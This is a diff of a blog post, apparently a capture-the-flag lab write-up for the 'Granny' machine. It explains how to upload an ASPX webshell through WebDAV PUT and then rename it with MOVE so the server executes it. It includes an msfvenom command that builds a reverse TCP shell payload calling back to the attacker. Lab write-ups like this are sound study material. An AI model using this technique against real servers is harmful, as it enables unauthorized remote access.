davidmckennirey/davidmckennirey.github.io/_posts/2021-05-04-granny-write-up.md

 PUT php SUCCEED: http://localhost/DavTestDir_Iqdz9inIgLQYklF/davtest_Iqdz9inIgLQYklF.php
 ```

 It looks like we aren't able to upload `.asp` or `.aspx` files, which would have made our lives a lot easier.
-However, if we remember the output of the `http-webdav-scan`, we are allowed to use the `MOVE` method. `MOVE` allows us to, well, move files around on the web server (duh), but this also allows us to change the name and extension of the files we move around.
-Our exploitation plan is now to use WebDAV to upload an `.aspx` webshell as a text file, then use `MOVE` to change it to an ASPX file that the server will execute.
-First things first, lets generate a webshell using `msfvenom`.
+However, if we remember the output of the `http-webdav-scan`, we are allowed to use the `MOVE` method. `MOVE` allows us to, well, move files around on the web server (duh), but it also allows us to change the name and extension of files we move.
+The plan is now to use WebDAV to upload an `.aspx` webshell as a text file, then use `MOVE` to change it to an ASPX file that the server will execute.
+First things first, let's generate a webshell using `msfvenom`.

 ```bash
 msfvenom -p windows/shell/reverse_tcp -f aspx LHOST=tun0 LPORT=443 -o shell.aspx
 ```

-Next, lets use one of our proxied PUT requests in Burp to upload the contents of `shell.aspx` as a text file.
+Next, let's use one of our proxied PUT requests in Burp to upload the contents of `shell.aspx` as a text file.

 ![](/assets/images/HTB/granny/granny-put-webshell.png)

-And now we can use `MOVE` to switch it from a `txt` file to an `aspx` file.
+And now we can use the WebDAV `MOVE` command to switch it from a `txt` file to an `aspx` file.

 ![](/assets/images/HTB/granny/granny-move-webshell.png)